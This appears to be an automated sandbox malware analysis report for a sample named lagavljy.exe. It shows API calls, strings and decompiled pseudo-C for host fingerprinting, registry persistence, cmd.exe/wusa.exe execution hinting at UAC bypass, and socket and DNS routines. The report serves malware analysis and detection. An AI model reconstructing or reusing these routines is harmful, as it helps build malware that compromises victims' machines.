Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58

Uniqueness

Uniqueness Score: -1.00%

Function 00401280, Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 0040139A
lstrlenW.KERNEL32(-00000003), ref: 00401571

Strings

, xrefs: 00401462
%systemroot%\system32\cmd.exe, xrefs: 00401316
useless, xrefs: 0040161E
uac, xrefs: 00401628
<, xrefs: 00401378
@, xrefs: 00401380
D, xrefs: 004015C6
wusa.exe, xrefs: 00401388

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: ExecuteShelllstrlen
String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
API String ID: 1628651668-1839596206
Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401D96, Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 205
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0040EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192);
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0040DF70(1, "work_srv");
					E0040DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0040EA84(1, _t104, _t92, 0);
				_t93 = 0;
				_t63 = E0040E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				if(E0040199C(_t63) == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0040E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0040F04E(_t93);
					E0040EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0040E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_v200 = E00401B71();
					E0040EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0040E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_v200 = E00401BDF();
					E0040EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x61;
				_t96 = E0040E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 8;
					E0040EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
				if( *0x41201d == 0) {
					if( *0x41201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00406EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x412110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}

APIs

GetVersionExA.KERNEL32 ref: 00401DC6
GetSystemInfo.KERNEL32(?), ref: 00401DE8
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
GetProcAddress.KERNEL32(00000000), ref: 00401E0A
GetCurrentProcess.KERNEL32(?), ref: 00401E1B
GetTickCount.KERNEL32 ref: 00401FC9

Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15

Strings

lid_file_upd, xrefs: 00401E25
localcfg, xrefs: 00401E2A, 00401E31, 00401E44, 00401E7D, 00401E8C, 00401EB2, 00401ED1, 00401EE7, 00401EFF, 00401F1C, 00401F34, 00401F50, 00401F70
IsWow64Process, xrefs: 00401DF2
kernel32, xrefs: 00401DF7
start_srv, xrefs: 00401E6C
net_type, xrefs: 00401E87
loader_id, xrefs: 00401F4B, 00401F6B
hi_id, xrefs: 00401F16, 00401F1B, 00401F33
work_srv, xrefs: 00401E5E
flags_upd, xrefs: 00401E3E, 00401E43, 00401E7C
born_date, xrefs: 00401EAD, 00401ECC

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
API String ID: 4207808166-1381319158
Opcode ID: 52000fdd36173797c6d9852f05b2f7d3bbe79e14d00c0f3373a6a06b26d807cb
Instruction ID: 54c1e59e0de162fea3d0b4a588507db8dabc792a1e082174f42e6dfe58141249
Opcode Fuzzy Hash: 52000fdd36173797c6d9852f05b2f7d3bbe79e14d00c0f3373a6a06b26d807cb
Instruction Fuzzy Hash: 3651FA705003446FD330AF768C85F67BAECEB84708F00493FF955A2292D7BDA94487A9

Uniqueness

Uniqueness Score: -1.00%

Function 00478578, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 361registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 00478643
RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 00478664
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 00478691
RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 0047869A

Strings

C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 00478818, 00478825, 00478835
", xrefs: 00478955

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Value$CloseOpenQuery
String ID: "$C:\Windows\SysWOW64\shayesoq\lagavljy.exe
API String ID: 237177642-506513753
Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
Instruction ID: a132afbed36759caf77090bbaf13263bd4d5fd1ba92cf436ccd1ec28de0d69fc
Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
Instruction Fuzzy Hash: A3C1C7B1940148BEEB11ABA5DD49EEF7B7CEB04304F10807FF608E2151EB784E949B69

Uniqueness

Uniqueness Score: -1.00%

Function 00472CB2, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 194memorynetworkCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00472CD6
socket.WS2_32(00000002,00000002,00000011), ref: 00472CF0
htons.WS2_32(00000000), ref: 00472D2B
select.WS2_32 ref: 00472D78
recv.WS2_32(?,00000000,00001000,00000000), ref: 00472D9A
GetProcessHeap.KERNEL32(00000000,00000108), ref: 00472E4B

Strings

ps, xrefs: 00472F17

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesshtonsrecvselectsocket
String ID: ps
API String ID: 127016686-3878219058
Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
Instruction ID: 54a94d245f7d946c6e416fcb44d19c53565ca75638cca01835c1b6aff94b598e
Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
Instruction Fuzzy Hash: 9261C271904304ABD7209F65DD08BEBBBF8FB48355F04881EF94897251D7F998848BAA

Uniqueness

Uniqueness Score: -1.00%

Function 004714D0, Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417stringCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 004715EA
lstrlenW.KERNEL32(-00000003), ref: 004717C1

Strings

D, xrefs: 00471816
<, xrefs: 004715C8
@, xrefs: 004715D0
, xrefs: 004716B2

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ExecuteShelllstrlen
String ID: $<$@$D
API String ID: 1628651668-1974347203
Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
Instruction ID: d8cf2c43d56d678955b500ad6908d9874b9fb4d4c74eba15b0a3fcda2008276d
Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
Instruction Fuzzy Hash: 41F180B15083419FD720DF68C888B9BB7E5FB88305F00892EF69A97360D778D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402DF2, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 97
memorylibrarynetworkCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00402DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00402CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}

APIs

GetModuleHandleA.KERNEL32(iphlpapi.dll,73BCEA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
htons.WS2_32(00000035), ref: 00402E88
inet_addr.WS2_32(?), ref: 00402E93
gethostbyname.WS2_32(?), ref: 00402EA6
GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6

Strings

GetNetworkParams, xrefs: 00402E28
iphlpapi.dll, xrefs: 00402DFB, 00402E00, 00402E10
~s`ysps, xrefs: 00402E93

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
String ID: GetNetworkParams$iphlpapi.dll$~s`ysps
API String ID: 929413710-64764534
Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0047764F, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 004776C2
RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 00477740
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 00477778
___ascii_stricmp.LIBCMT ref: 0047789D
RegCloseKey.ADVAPI32(?), ref: 00477937
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00477956
RegCloseKey.ADVAPI32(?), ref: 00477967
RegCloseKey.ADVAPI32(?), ref: 00477995
RegCloseKey.ADVAPI32(?), ref: 00477A3F

Part of subcall function 0047F3F5: lstrlen.KERNEL32(000000E4,00000000,004122F8,000000E4,00477713,?), ref: 0047F3FD

GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 004779DF
RegCloseKey.ADVAPI32(?), ref: 00477A36

Strings

", xrefs: 004777E9

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
String ID: "
API String ID: 3433985886-123907689
Opcode ID: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
Instruction ID: a2c899ec5a09e345660b6fe0eaf01e5cb2465adf8acc027b5ad49a8d7386fc1f
Opcode Fuzzy Hash: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
Instruction Fuzzy Hash: 75C1C6B1904209AFEB119BA5DC45FEF7BB9EF05310F5080A7F508E6251DA78DE84CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040704C, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 332
registryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040704C(intOrPtr _a4, int _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				int _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				void* _t166;
				int _t196;
				int _t202;
				void* _t203;
				void* _t204;
				void* _t206;
				void* _t207;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
					L21:
					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00406DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
						_t206 = _t204 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t207 = _t206 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0040EF00( &_v364,  &_v363);
									_t149 = E0040ED23( &_v364, 0x22);
									_t207 = _t207 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0040ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0040ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00406CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											asm("popad");
											asm("popad");
											asm("popad");
											asm("popad");
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = 0x4122f8;
											_t166 = 0xad;
											_t123 = E00406C96(0x4122f8);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0040EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											_t71 = _t166 - 0x40; // 0x4122b8
											__eflags = _t71 - 0x3f;
											if(_t71 > 0x3f) {
												goto L57;
											}
											__eflags = 0xf8 - 0x10;
											if(0xf8 >= 0x10) {
												goto L57;
											}
											_t202 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t202;
											if(_t202 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t202 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t204 = _t206 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x61616161;
						__eflags = _t158 - (_v32 ^ 0x61616161);
						if(_t158 == (_v32 ^ 0x61616161)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12);
					goto L21;
				}
			}

0x00407055
0x00407058
0x0040705a
0x00407061
0x00407068
0x00407071
0x00407073
0x00407073
0x00407075
0x0040707a
0x0040707c
0x0040707c
0x0040707e
0x00407083
0x00407085
0x00407085
0x00407087
0x0040708c
0x0040708e
0x0040708e
0x004070b4
0x004070b9
0x004070ca
0x004071b8
0x004071c8
0x00000000
0x004070d0
0x004070d0
0x004070d8
0x004070df
0x004070e3
0x004070e4
0x004070e9
0x004070ed
0x004070ee
0x004070f1
0x004070f2
0x004070f5
0x0040719b
0x0040719e
0x004071a9
0x00000000
0x00000000
0x004070fb
0x004070fd
0x0040716e
0x0040716e
0x0040716e
0x0040716e
0x00407174
0x0040717b
0x0040717f
0x00407180
0x00407185
0x00407189
0x0040718a
0x0040718d
0x00407194
0x00000000
0x00407194
0x004070ff
0x00407102
0x00000000
0x00000000
0x00407104
0x00407107
0x00000000
0x00000000
0x00407109
0x0040710d
0x00000000
0x00000000
0x00407123
0x00407128
0x0040712d
0x0040712f
0x0040712f
0x00407130
0x00407133
0x004071d0
0x004071f4
0x004071f7
0x004071fc
0x004071ff
0x00407203
0x00407227
0x0040722e
0x0040723e
0x0040724c
0x00407251
0x00407254
0x00407256
0x00407258
0x00407258
0x00407256
0x00407280
0x00407282
0x0040728a
0x0040728c
0x004072c2
0x004072c9
0x004072cb
0x004072e6
0x004072e8
0x004072ef
0x004072f2
0x004072f4
0x00407301
0x00407301
0x00407301
0x004072f6
0x004072fc
0x004072fc
0x00407307
0x0040730d
0x0040730f
0x00407335
0x00407336
0x00407337
0x00407338
0x00407339
0x0040733e
0x0040734b
0x0040734e
0x00407354
0x0040735b
0x0040735d
0x004073d5
0x004073d8
0x004073de
0x004073e2
0x004073eb
0x004073f1
0x004073f2
0x004073f4
0x004073f7
0x00000000
0x004073f7
0x0040735f
0x00407362
0x00407365
0x00000000
0x00000000
0x0040736d
0x00407370
0x00000000
0x00000000
0x00407372
0x00407375
0x0040737a
0x0040737c
0x0040738d
0x00407393
0x00407395
0x00407397
0x00407397
0x00407395
0x0040739d
0x004073a0
0x004073a2
0x004073a4
0x004073a4
0x004073a6
0x004073a9
0x004073b2
0x004073b8
0x004073b9
0x004073bc
0x004073c4
0x004073ca
0x004073cb
0x004073cd
0x00000000
0x00407311
0x00407314
0x0040731a
0x0040731d
0x00407326
0x0040732c
0x0040732d
0x00000000
0x0040732d
0x0040730f
0x004072d0
0x004072d6
0x00000000
0x0040728e
0x00407291
0x00407297
0x0040729a
0x004072a3
0x004072a9
0x004072aa
0x004072aa
0x004072ac
0x004072af
0x004072b2
0x004071cb
0x004071cf
0x004071cf
0x0040728c
0x00407208
0x0040720e
0x00407212
0x0040721b
0x00407221
0x00407224
0x00000000
0x00407224
0x0040713d
0x00407142
0x00407143
0x00407145
0x0040715e
0x00407166
0x0040716b
0x00000000
0x0040716b
0x0040714b
0x00407154
0x0040715a
0x0040715c
0x00000000
0x00000000
0x00000000
0x0040715c
0x004071b2
0x00000000
0x004071b2

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,73B743E0,?,73B743E0,00000000), ref: 004070C2
RegEnumValueA.ADVAPI32 ref: 0040719E
RegCloseKey.ADVAPI32(73B743E0,?,73B743E0,00000000), ref: 004071B2
RegCloseKey.ADVAPI32(73B743E0), ref: 00407208
RegCloseKey.ADVAPI32(73B743E0), ref: 00407291
___ascii_stricmp.LIBCMT ref: 004072C2
RegCloseKey.ADVAPI32(73B743E0), ref: 004072D0
RegCloseKey.ADVAPI32(73B743E0), ref: 00407314
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
RegCloseKey.ADVAPI32(73B743E0), ref: 004073D8

Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD

Strings

, xrefs: 00407194
", xrefs: 00407227

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
String ID: $"
API String ID: 4293430545-3817095088
Opcode ID: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
Instruction ID: 42610d5d4912e138811464987e42a56107d9bf2f6382ea6b9d81aa24fc4965e2
Opcode Fuzzy Hash: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
Instruction Fuzzy Hash: B5B17071D08209BAEB159FA1DC45BEF77B8AB04304F20047BF501F61D1EB79AA94CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD89, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0040AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E004030B5() == 0) {
